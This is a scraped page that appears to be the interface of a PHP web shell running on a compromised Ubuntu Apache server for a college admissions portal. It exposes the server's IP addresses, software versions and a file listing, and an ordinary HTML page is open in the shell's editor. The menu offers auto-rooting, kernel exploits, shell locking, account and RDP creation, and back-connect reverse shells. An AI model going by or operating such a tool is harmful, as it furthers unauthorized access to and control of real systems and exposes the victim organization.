Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.146.178.220
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
kus /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxrwxrwx
halltickets
[ DIR ]
drwxrwsrwx
images
[ DIR ]
drwxr-sr-x
img
[ DIR ]
drwxr-sr-x
imported_files
[ DIR ]
drwxrwsrwx
misc_files
[ DIR ]
drwxrwsrwx
notifications
[ DIR ]
drwxrwxrwx
student_photos
[ DIR ]
drwxrwsrwx
study_material
[ DIR ]
drwxrwsrwx
teacher_photos
[ DIR ]
drwxrwsrwx
tmpphotos
[ DIR ]
drwxrwxrwx
upload
[ DIR ]
drwxrwsrwx
MainPage.html
21.7
KB
-rwxr-xr-x
collegeInfoPopup.html
4.36
KB
-rwxr-xr-x
docverify.php
1.25
KB
-rw-rw-r--
flash.html
2.23
KB
-rwxr-xr-x
forgotpassword.html
3.38
KB
-rwxr-xr-x
homepage.html
3.35
KB
-rwxr-xr-x
index.php
5.07
KB
-rwxr-xr-x
index_wait.html
6.23
KB
-rwxr-xr-x
indexlogin.html
6.19
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : flash.html
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title></title> <meta name="description" content="Remodal example"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" /> <meta http-equiv="pragma" content="no-cache" /> <link rel="stylesheet" href="../css/collinfo_popup.css"> <script>window.jQuery || document.write('<script src="../libs/jquery.min.js"><\/script>')</script> <script type="text/javascript" src ="../js/index.js?v=04122018" ></script> <script type="text/javascript" src="../js/MainPage.js?v=04122018"></script> </head> <body onload="getMessages()"> <div class="remodal-bg"> <div class="remodal" id = "admstaticstics" data-remodal-id="modal"> <div id="message" style="text-align: left"> </div> <div id = "continue"> </div> </div> <script src="../libs/jquery.blockUI.js" type="text/javascript"></script> <script src="../js/collinfo_popup.js"></script> <script type="text/javascript"> /*function getadmdata() { var str = `<h2>Admission Statistics</h2> <hr style='border:1px solid #16a085;'> <table style="margin-left:10px;text-align: left;width: 90%" border="1" cellpadding="10" cellspacing="0" > <thead> <tr nobr="true"> <th width="25" align="center"><b>Sl. No.</b></th> <th width="40" align="center"><b>Degree Code</b></th> <th width="150" align="left"><b>Degree Name</b></th> <th width="70" align="center"><b>Data Sent to Univ.</b></th> <th width="60" align="center"><b>Login Created</b></th> <th width="60" align="center"><b>Adm. Entry</b></th> <th width="60" align="center"><b>Final Sub.</b></th> <th width="60" align="center"><b>Ack. Done</b></th> </tr> </thead> </table> <br> <span class="remodal-cancel" onclick='admcollegesum()'>Continue</span>`; $('#admstaticstics').html(str); }*/ </script> </body> </html>
Close